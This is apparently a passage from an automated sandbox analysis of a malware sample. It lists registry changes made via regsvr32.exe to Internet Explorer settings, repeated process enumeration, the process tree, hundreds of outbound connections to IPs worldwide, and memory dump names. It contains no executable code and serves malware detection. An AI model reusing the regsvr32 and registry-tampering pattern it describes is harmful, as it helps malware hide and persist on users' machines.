Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\SOFTWARE\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\1861f5f5c1bf4c6eabe0b6fc8d792019_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\1861f5f5c1bf4c6eabe0b6fc8d792019_JaffaCakes118.exe"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
RU 94.243.165.2:443 tcp
US 54.156.218.17:80 tcp
CN 113.75.234.184:80 tcp
JP 126.220.169.175:80 tcp
US 157.204.244.127:80 tcp
MX 170.25.205.164:80 tcp
MU 102.237.145.103:80 tcp
CN 112.26.34.112:80 tcp
US 214.27.165.118:80 tcp
ES 88.11.23.25:80 tcp
RU 31.132.72.179:80 tcp
US 214.58.62.195:80 tcp
BR 189.107.200.79:80 tcp
US 22.147.146.147:80 tcp
KR 121.133.2.84:80 tcp
US 40.60.31.138:80 tcp
US 144.241.96.106:80 tcp
US 55.121.232.122:80 tcp
US 34.227.122.76:80 tcp
US 44.223.146.128:80 tcp
GB 80.1.19.39:80 tcp
CN 223.5.88.137:80 tcp
US 7.56.84.213:80 tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
CN 106.16.226.165:80 tcp
CM 165.210.162.64:80 tcp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 158.253.126.197:80 tcp
GB 146.41.96.106:80 tcp
US 143.156.52.200:8080 tcp
US 8.8.8.8:53 135.126.19.2.in-addr.arpa udp
KR 39.119.136.101:80 tcp
US 143.101.214.134:80 tcp
TW 42.73.134.148:80 tcp
US 44.53.225.115:80 tcp
US 174.143.55.106:80 tcp
DE 141.35.186.45:8080 tcp
US 171.163.11.121:80 tcp
US 66.89.4.4:8080 tcp
FR 91.88.105.6:80 tcp
US 107.32.213.228:80 tcp
JP 59.136.127.254:80 tcp
IT 79.13.241.60:80 tcp
CH 170.236.27.83:8080 tcp
ES 84.78.211.28:80 tcp
JP 210.165.48.1:80 tcp
US 100.221.145.55:80 tcp
ES 86.104.119.230:80 tcp
CN 123.50.177.162:80 tcp
BR 179.76.3.200:80 tcp
US 97.128.214.20:80 tcp
US 147.203.200.8:80 tcp
TN 102.169.85.223:80 tcp
US 147.63.207.244:80 tcp
JP 180.147.104.98:80 tcp
US 18.252.22.167:8080 tcp
TR 88.240.110.124:80 tcp
RU 81.13.55.59:80 tcp
CO 190.159.112.92:80 tcp
PL 83.28.10.114:80 tcp
US 30.186.242.245:80 tcp
DE 79.221.227.199:80 tcp
US 209.236.122.172:80 tcp
US 107.162.186.182:80 tcp
US 69.74.169.179:443 tcp
US 8.8.8.8:53 182.186.162.107.in-addr.arpa udp
AE 5.30.42.130:80 tcp
BR 179.241.23.91:80 tcp
US 8.8.8.8:53 138.211.222.173.in-addr.arpa udp
US 8.104.39.227:80 tcp
US 15.149.42.34:80 tcp
US 23.20.223.137:80 tcp
ES 84.122.211.36:80 tcp
US 144.223.237.222:80 tcp
US 132.79.140.164:443 tcp
US 8.8.8.8:53 144.190.18.2.in-addr.arpa udp
US 29.245.88.92:80 tcp
CH 57.41.144.59:443 tcp
N/A 127.121.58.54:80 tcp
US 29.100.95.197:8080 tcp
US 76.99.62.216:80 tcp
SG 133.152.148.70:8080 tcp
US 198.183.182.132:80 tcp
KW 46.186.243.50:443 tcp
DE 160.82.37.56:80 tcp
US 166.126.134.215:80 tcp
US 73.94.38.255:80 tcp
US 107.78.80.245:80 tcp
US 12.26.26.182:80 tcp
TW 61.65.21.140:8080 tcp
US 29.29.100.163:80 tcp
IT 93.52.225.56:80 tcp
BA 109.205.33.199:80 tcp
SE 82.182.48.173:80 tcp
BA 109.205.33.199:80 109.205.33.199 tcp
US 8.8.8.8:53 199.33.205.109.in-addr.arpa udp
CN 115.154.172.21:80 tcp
US 16.225.250.199:80 tcp
US 170.160.11.210:80 tcp
JP 182.165.74.17:80 tcp
US 66.59.100.29:80 tcp
MX 148.218.203.42:80 tcp
US 26.153.30.122:80 tcp
GA 41.159.166.30:80 tcp
CN 49.116.30.15:80 tcp
TR 188.57.206.216:8080 tcp
US 184.19.142.138:8080 tcp
NL 84.24.12.140:80 tcp
BR 187.29.101.232:80 tcp
NL 145.19.231.33:8080 tcp
SG 43.126.253.105:80 tcp
US 72.4.242.110:80 tcp
AE 2.48.32.115:80 tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 206.128.116.164:80 tcp
US 162.200.150.45:80 tcp
US 17.10.54.168:80 tcp
US 184.23.110.203:80 tcp
US 18.31.80.199:80 tcp
ES 88.27.94.160:80 tcp
CO 190.26.28.5:443 tcp
RU 109.111.31.83:80 tcp
CN 223.241.211.204:80 tcp
IT 81.117.150.184:80 tcp
NL 84.85.108.48:443 tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 174.85.129.19:80 tcp
DE 160.49.112.164:80 tcp
US 159.251.231.145:80 tcp
CN 110.87.31.197:80 tcp
US 40.171.206.87:443 tcp
US 55.166.143.197:80 tcp
CN 223.95.224.179:8080 tcp
US 47.155.155.49:80 tcp
MU 102.222.225.41:80 tcp
SY 188.160.138.108:80 tcp
KR 113.199.19.116:80 tcp
GB 51.33.48.110:80 tcp
CN 123.235.28.174:80 tcp
US 131.15.188.11:80 tcp
US 40.48.179.17:80 tcp
EG 156.192.137.10:80 tcp
CN 61.146.244.126:80 tcp
US 70.124.207.117:8080 tcp
US 136.49.21.173:80 tcp
IN 103.28.156.249:80 tcp
IN 110.224.20.56:80 tcp
ZA 196.59.45.146:80 tcp
US 155.154.105.119:8080 tcp
MU 196.160.145.144:80 tcp
IE 51.171.211.46:443 tcp
US 161.121.237.87:443 tcp
CA 130.15.74.92:8080 tcp
US 157.210.233.196:80 tcp
US 66.14.148.79:80 tcp
KR 14.37.153.229:80 tcp
US 22.65.16.210:80 tcp
US 166.70.92.33:80 tcp
BA 109.205.33.199:80 109.205.33.199 tcp
N/A 10.143.195.43:80 tcp
JP 118.237.183.238:80 tcp
ES 13.224.107.142:8080 tcp
BR 177.174.58.6:80 tcp
ZA 197.89.222.189:80 tcp
US 66.45.21.202:80 tcp
US 6.187.139.144:80 tcp
US 167.136.22.226:80 tcp
US 98.229.240.103:80 tcp
TW 210.68.71.234:443 tcp
RU 212.59.104.2:8080 tcp
US 30.228.28.89:80 tcp
US 144.241.21.57:80 tcp
US 12.171.11.128:80 tcp
US 150.172.44.145:80 tcp
US 74.168.197.75:80 tcp
RU 31.132.146.74:80 tcp
US 50.53.61.99:80 tcp
VE 186.166.105.199:443 tcp
DE 147.190.233.162:80 tcp
US 11.92.250.66:80 tcp
US 16.67.222.69:80 tcp
US 40.254.253.168:80 tcp
US 184.180.180.52:80 tcp
MX 148.226.113.28:80 tcp
GB 146.26.218.152:8080 tcp
CN 106.54.180.43:80 tcp
HK 47.240.207.169:8080 tcp
GB 25.66.131.184:80 tcp
CN 59.61.180.197:80 tcp
SD 105.239.115.129:80 tcp
US 56.2.88.184:80 tcp
US 8.79.203.191:80 tcp
SE 194.236.20.49:80 tcp
ID 182.12.72.27:80 tcp
US 155.103.179.217:80 tcp
DE 93.253.10.151:80 tcp

Files

memory/1480-0-0x0000000002B80000-0x0000000002C80000-memory.dmp

memory/1480-1-0x00000000005C0000-0x00000000005C1000-memory.dmp

memory/1480-2-0x0000000002B80000-0x0000000002C80000-memory.dmp

memory/1480-3-0x0000000000400000-0x0000000000484000-memory.dmp

memory/1480-5-0x00000000007B0000-0x000000000087C000-memory.dmp

memory/1480-7-0x00000000007B0000-0x000000000087C000-memory.dmp

memory/1480-9-0x00000000007B0000-0x000000000087C000-memory.dmp

memory/1480-8-0x00000000007B0000-0x000000000087C000-memory.dmp

memory/1480-6-0x00000000007B0000-0x000000000087C000-memory.dmp

memory/4340-15-0x00000000009D0000-0x00000000009D9000-memory.dmp

memory/1480-17-0x0000000000400000-0x0000000000484000-memory.dmp

memory/1480-10-0x00000000007B0000-0x000000000087C000-memory.dmp

memory/4340-20-0x00000000009D0000-0x00000000009D9000-memory.dmp

memory/4340-18-0x00000000009D0000-0x00000000009D9000-memory.dmp

memory/4340-22-0x00000000008C0000-0x000000000098C000-memory.dmp

memory/4340-25-0x00000000008C0000-0x000000000098C000-memory.dmp

memory/4340-24-0x00000000008C0000-0x000000000098C000-memory.dmp

memory/4340-23-0x00000000008C0000-0x000000000098C000-memory.dmp

memory/4340-21-0x00000000008C0000-0x000000000098C000-memory.dmp

memory/4340-26-0x00000000008C0000-0x000000000098C000-memory.dmp

memory/4936-33-0x00000000009D0000-0x00000000009D9000-memory.dmp

memory/4936-36-0x00000000009D0000-0x00000000009D9000-memory.dmp

memory/4936-34-0x00000000009D0000-0x00000000009D9000-memory.dmp

memory/4936-38-0x0000000000C00000-0x0000000000CCC000-memory.dmp

memory/4936-42-0x0000000000C00000-0x0000000000CCC000-memory.dmp

memory/4936-41-0x0000000000C00000-0x0000000000CCC000-memory.dmp

memory/4936-40-0x0000000000C00000-0x0000000000CCC000-memory.dmp

memory/4936-39-0x0000000000C00000-0x0000000000CCC000-memory.dmp

memory/4936-37-0x0000000000C00000-0x0000000000CCC000-memory.dmp

memory/4936-47-0x0000000000C00000-0x0000000000CCC000-memory.dmp

memory/4936-45-0x0000000000C00000-0x0000000000CCC000-memory.dmp

memory/4936-50-0x0000000000C00000-0x0000000000CCC000-memory.dmp

memory/4936-48-0x0000000000C00000-0x0000000000CCC000-memory.dmp

memory/4936-44-0x0000000000C00000-0x0000000000CCC000-memory.dmp

memory/4936-43-0x0000000000C00000-0x0000000000CCC000-memory.dmp

memory/4936-46-0x0000000000C00000-0x0000000000CCC000-memory.dmp

memory/4936-51-0x0000000000C00000-0x0000000000CCC000-memory.dmp

memory/1552-52-0x00000000009D0000-0x00000000009D9000-memory.dmp

memory/1552-55-0x00000000009D0000-0x00000000009D9000-memory.dmp

memory/1552-53-0x00000000009D0000-0x00000000009D9000-memory.dmp

memory/1552-56-0x0000000000400000-0x00000000004CC000-memory.dmp

memory/1552-60-0x0000000000400000-0x00000000004CC000-memory.dmp

memory/1552-61-0x0000000000400000-0x00000000004CC000-memory.dmp

memory/1552-59-0x0000000000400000-0x00000000004CC000-memory.dmp

memory/1552-58-0x0000000000400000-0x00000000004CC000-memory.dmp

memory/1552-57-0x0000000000400000-0x00000000004CC000-memory.dmp

memory/4936-62-0x0000000000C00000-0x0000000000CCC000-memory.dmp

memory/4936-63-0x0000000000C00000-0x0000000000CCC000-memory.dmp

memory/4488-64-0x00000000009D0000-0x00000000009D9000-memory.dmp

memory/4488-67-0x00000000009D0000-0x00000000009D9000-memory.dmp

memory/4488-65-0x00000000009D0000-0x00000000009D9000-memory.dmp

memory/4488-68-0x00000000004F0000-0x00000000005BC000-memory.dmp